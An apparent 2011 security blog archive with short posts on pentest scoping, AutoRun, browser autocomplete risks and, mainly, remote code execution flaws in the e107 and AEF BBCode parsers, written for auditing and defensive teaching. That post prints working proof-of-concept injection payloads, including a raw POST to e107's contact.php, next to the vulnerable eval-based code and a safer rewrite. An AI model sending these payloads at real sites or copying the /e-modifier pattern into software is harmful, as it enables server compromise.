Saturday, January 29, 2011

[Book-Review] The Myths of Security: What the Computer Security Industry Doesn't Want You to Know

This book, written by John Viega, is meant mainly for non-security IT professionals and technically savvy readers. The author lays out his views on why AV fails, why we can still get 0wned even when we take sensible precautions against threats, why HTTPS fails, why IDS sucks, why CAPTCHA sucks, why responsible disclosure isn't responsible, and why application security hasn't been achieved and may never be.

At around $7.36 for a used copy, it's worth learning from someone who has been in IT security for many years and has written several security books (Building Secure Software, Secure Programming Cookbook, 19 Deadly Sins of Software Security, etc.).

Sunday, January 23, 2011

Common Enterprise Weakness: Only scan this and that server

Case Study:
https://www.trustwave.com/downloads/Trustwave-Case-Study-Internal-Penetration-Test.pdf


Analysis:
The Trustwave team pointed out that, starting from an insecure network segment, they eventually compromised the highly critical segment that processes payment card information.

Lesson Learnt:
In our experience, small and medium (and sometimes even large) enterprises hire pentest services only for their critical servers, while leaving the workstations on their other network segments unsecured. Password problems (weak or blank passwords on the OS as well as on database and commercial application servers) remain common in some organizations because of sloppy system administration, even where a written policy requires strong passwords.
Going by the case study, the Trustwave team would have found it much harder to break into the (presumably hardened) payment card network if they had been scoped to that segment alone. Trustwave presumably explained to the client, and negotiated, that testing only the well-secured portion would not represent its actual security state.

e107 Remote Code Execution via BBCode (aka Attacking Flaws in BBCode)

Vulnerability:
http://php-security.org/2010/05/19/mops-2010-035-e107-bbcode-remote-php-code-execution-vulnerability/index.html


Analysis:
To give administrators full control over the application, web developers often ship a feature that lets admin users run arbitrary PHP code from inside the application. e107 CMS is not the only one; Drupal also has this feature (its PHP filter module).


[CODE]
// The filter meant to neutralize [php] in text that must not carry it:
// the opening bracket is replaced with its HTML entity, so the tag is
// displayed instead of being parsed and executed. (The entity shows up as
// a plain "[" once this page is rendered, which makes the line look like
// a no-op.)
$text = preg_replace("#\[(php)#i", "&#91;\\1", $text);
[/CODE]

The PoC exploit is:

--------------------------------------------------------------------------------------------
POST /contact.php HTTP/1.1
Host: xxxx
User-Agent: e107 0.7.20 Remote Code Execution Exploit
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

send-contactus=1&author_name=[php]phpinfo()%3bdie()%3b[/php]

--------------------------------------------------------------------------------------------

Similarly, AEF (Advanced Electron Forum) had a flawed bbCode implementation, as shown by GulfTech Security Research.

[CODE]
//Email Links
if($globals['bbc_email']){

    // The "e" modifier makes preg_replace() eval() the replacement string
    // as PHP after substituting the captures. "$1" is therefore interpolated
    // into a double-quoted PHP string, and a capture such as {${phpinfo()}}
    // is executed rather than treated as text.
    $text = preg_replace(
        array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
              "/\[email\](.*?)\[\/email\]/ies"),
        array('check_email("$1", "$2")',
              'check_email("$1", "$1")'), $text);

}
[/CODE]



The PoC exploit is:

[email]{${phpinfo()}}[/email]
 
 
 
Lessons Learnt:

Offering arbitrary code execution to privileged users means that if attackers take over an admin account, they have also compromised the OS account the web application runs as on the server, which gives them a foothold for further attacks on the server as a whole. Feeding strings produced by a regexp-based replacement into eval, the /e modifier, user-definable callbacks and the like is dangerous because the matched text is then interpreted as code rather than data.

In a source code audit, recommend that developers disable or remove this feature. If it is a must-have business requirement, list every application feature that is high risk in the sense of giving attackers shell access once an admin account is compromised. Such features include (but are not limited to):

1. File and Directory Operations (File Upload/Delete/Create, Directory Delete/Browse)
2. Running executable programs fed by users' input.
3. Arbitrary Operating System Command Execution Feature for privileged users
4. Arbitrary Database Command Execution Feature for privileged users


Find the authentication/authorization check function (is_admin, is_user, is_anonymous or similar) and verify that the developers call it at every entry point of each such risky feature.
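As an added example (not code from e107 or AEF), the following PHP sketch puts the /e-modifier pattern from the AEF snippet next to its preg_replace_callback replacement and shows the kind of privilege gate the audit advice above asks for. The names is_admin, check_email and render_* and the payloads are constructed for illustration; it needs PHP 7.4 or later.

```php
<?php
// Added example, not code from e107 or AEF. Shows the unsafe /e pattern,
// its preg_replace_callback replacement, and a privilege gate for [php].

// Hypothetical privilege check; a real application would consult its
// session or ACL. Returns false here, so the admin branch is never taken.
function is_admin(): bool
{
    return false;
}

// Validates the address and HTML-escapes both parts. The callback versions
// below hand the captured text to this function as data, never as PHP source.
function check_email(string $addr, string $label): string
{
    $safeLabel = htmlspecialchars($label, ENT_QUOTES, 'UTF-8');
    if (filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
        return $safeLabel;   // not an address: emit the label as plain text
    }
    $safeAddr = htmlspecialchars($addr, ENT_QUOTES, 'UTF-8');
    return '<a href="mailto:' . $safeAddr . '">' . $safeLabel . '</a>';
}

// UNSAFE: the AEF-style call. With the /e modifier, preg_replace() substitutes
// "$1" into the replacement string and eval()s the result, so an input of
// {${phpinfo()}} is executed. PHP 7 removed /e (and this file itself needs
// PHP 7.4 for arrow functions), so the call is guarded and kept only to sit
// next to its replacement.
function render_email_unsafe(string $text): ?string
{
    if (PHP_VERSION_ID >= 70000) {
        return null;   // /e no longer exists on this interpreter
    }
    return preg_replace('/\[email\](.*?)\[\/email\]/ies',
                        'check_email("$1", "$1")', $text);
}

// SAFE: same tags, but the captures reach check_email() as ordinary strings.
function render_email_safe(string $text): string
{
    $text = preg_replace_callback('/\[email=(.*?)\](.*?)\[\/email\]/is',
        fn(array $m) => check_email($m[1], $m[2]), $text);
    return preg_replace_callback('/\[email\](.*?)\[\/email\]/is',
        fn(array $m) => check_email($m[1], $m[1]), $text);
}

// [php] is a code-execution feature, not a formatting tag. Gate it on the
// privilege check at the point of use; for everyone else turn the opening
// bracket into its entity so the tag is displayed instead of parsed.
function render_php_tag(string $text): string
{
    if (!is_admin()) {
        return preg_replace('#\[(php)#i', '&#91;$1', $text);
    }
    // Admin path: this is the feature the audit advice says to remove.
    return preg_replace_callback('#\[php\](.*?)\[/php\]#is', function (array $m) {
        ob_start();
        eval($m[1]);
        return ob_get_clean();
    }, $text);
}

// Constructed payloads, taken from the PoCs above. Single quotes matter:
// inside a double-quoted PHP string {${phpinfo()}} would already execute.
echo render_email_safe('[email]{${phpinfo()}}[/email]'), PHP_EOL;
// the braces survive as escaped text; nothing is evaluated
echo render_php_tag('[php]phpinfo();die();[/php]'), PHP_EOL;
// the opening bracket is now an entity, so no BBCode parser sees a tag
```

The point of render_email_safe() is that the captured text never becomes part of PHP source; it is passed as an argument, so the {${...}} syntax is just characters. render_php_tag() shows where the is_admin()-style check belongs: at the entry of the risky feature itself, not somewhere earlier in the request path that a different entry point (such as contact.php in the e107 case) can skip.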

Friday, January 21, 2011

Autorun

Malware spreads via readable/writable removable media on Windows partly because:

  • Windows enables AutoRun by default
  • Some applications even ask users to enable AutoRun if it is disabled.

Wednesday, January 19, 2011

Hacking Auto-Complete

Jeremiah's Research:
http://www.slideshare.net/jeremiahgrossman/breaking-browsers-hacking-autocomplete-blackhat-usa-2010


Established Recommendation:
Disable autocomplete by setting autocomplete="off" on the password input field (or on the form).
The majority of web developers still ignore this.


Myth:
Before Jeremiah's research, it was widely believed that autocomplete was ONLY a local privacy issue: an attacker with physical access to a victim's machine could read the browser's stored autocomplete values.


Lesson Learnt:
Revisit established security recommendations that address issues considered low-risk or impossible to exploit.

Work harder, or think outside the box, to build a convincing PoC that turns such a low-risk issue into a medium or high one.

Friday, January 7, 2011

Weak Fraud Check vulnerable to Brute Force


We've seen fraud checks used in web applications such as billing systems and email registration (Gmail, for example). Here, developers still follow an old habit: verification by digits only.

